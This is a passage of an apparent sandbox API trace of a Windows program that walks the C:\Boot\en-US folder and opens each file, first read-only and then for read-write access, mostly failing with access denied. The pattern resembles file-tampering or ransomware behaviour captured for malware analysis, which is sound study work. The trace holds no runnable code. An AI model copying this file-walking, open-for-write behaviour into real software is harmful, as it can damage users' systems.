hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0082.932] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.932] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.932] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68b88, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧⅘\x01⺊Ā")) returned 0 [0082.932] FindClose (in: hFindFile=0x78690 | out: hFindFile=0x78690) returned 1 [0082.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0082.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0082.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0082.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0082.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0082.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0082.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0082.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0082.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.933] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.933] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.933] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.933] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.933] AreFileApisANSI () returned 1 [0082.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\en-US", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\en-US", lpUsedDefaultChar=0x0) returned 14 [0082.933] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.933] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0082.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0082.933] AreFileApisANSI () returned 1 [0082.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0082.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88748 [0082.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88748, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\en-US") returned 14 [0082.934] CreateFileW (lpFileName="C:\\Boot\\en-US" (normalized: "c:\\boot\\en-us"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.934] GetLastError () returned 0x5 [0082.934] GetLastError () returned 0x5 [0082.934] SetLastError (dwErrCode=0x5) [0082.934] GetLastError () returned 0x5 [0082.934] SetLastError (dwErrCode=0x5) [0082.934] GetLastError () returned 0x5 [0082.934] SetLastError (dwErrCode=0x5) [0082.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.934] AreFileApisANSI () returned 1 [0082.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0082.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88798 [0082.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88798, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\en-US") returned 14 [0082.934] CreateFileW (lpFileName="C:\\Boot\\en-US" (normalized: "c:\\boot\\en-us"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.934] GetLastError () returned 0x5 [0082.934] GetLastError () returned 0x5 [0082.934] SetLastError (dwErrCode=0x5) [0082.934] GetLastError () returned 0x5 [0082.934] SetLastError (dwErrCode=0x5) [0082.934] GetLastError () returned 0x5 [0082.934] SetLastError (dwErrCode=0x5) [0082.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0082.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0082.935] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.935] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.935] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.935] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0082.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0082.935] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000b9ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef586d37, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0082.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0082.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0082.935] FindFirstFileExW (in: lpFileName="C:\\Boot\\en-US\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x782d0 [0082.935] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef57d0f5, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.935] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef569843, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x327294d0, ftLastWriteTime.dwHighDateTime=0x1d2a030, nFileSizeHigh=0x0, nFileSizeLow=0x121a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0082.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0082.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0082.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0082.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0082.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0082.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0082.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0082.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46b38 [0082.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0082.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0082.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0082.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0082.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0082.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0082.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0082.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0082.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0082.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0082.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0082.936] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.936] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.936] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.936] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0082.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.936] AreFileApisANSI () returned 1 [0082.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\en-US\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\en-US\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0082.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.936] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.936] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0082.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0082.937] AreFileApisANSI () returned 1 [0082.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0082.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53718 [0082.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x53718, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 30 [0082.937] CreateFileW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0082.937] GetFileType (hFile=0x430) returned 0x1 [0082.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0082.937] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0082.937] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0082.937] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0082.938] CloseHandle (hObject=0x430) returned 1 [0082.938] AreFileApisANSI () returned 1 [0082.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0082.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x534d8 [0082.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 30 [0082.938] CreateFileW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.938] GetLastError () returned 0x5 [0082.938] GetLastError () returned 0x5 [0082.938] SetLastError (dwErrCode=0x5) [0082.938] GetLastError () returned 0x5 [0082.938] SetLastError (dwErrCode=0x5) [0082.938] GetLastError () returned 0x5 [0082.938] SetLastError (dwErrCode=0x5) [0082.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0082.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0082.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.938] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.938] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.938] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xafa0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0082.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0082.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0082.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0082.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0082.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0082.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0082.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0082.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0082.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0082.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0082.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0082.939] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.939] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.939] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.939] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0082.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.939] AreFileApisANSI () returned 1 [0082.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\en-US\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\en-US\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0082.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.939] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.939] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0082.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0082.940] AreFileApisANSI () returned 1 [0082.940] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0082.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x534d8 [0082.940] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\en-US\\memtest.exe.mui") returned 30 [0082.940] CreateFileW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0082.940] GetFileType (hFile=0x430) returned 0x1 [0082.940] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0082.940] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0082.940] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0082.940] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0082.941] CloseHandle (hObject=0x430) returned 1 [0082.941] AreFileApisANSI () returned 1 [0082.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0082.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0082.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\en-US\\memtest.exe.mui") returned 30 [0082.941] CreateFileW 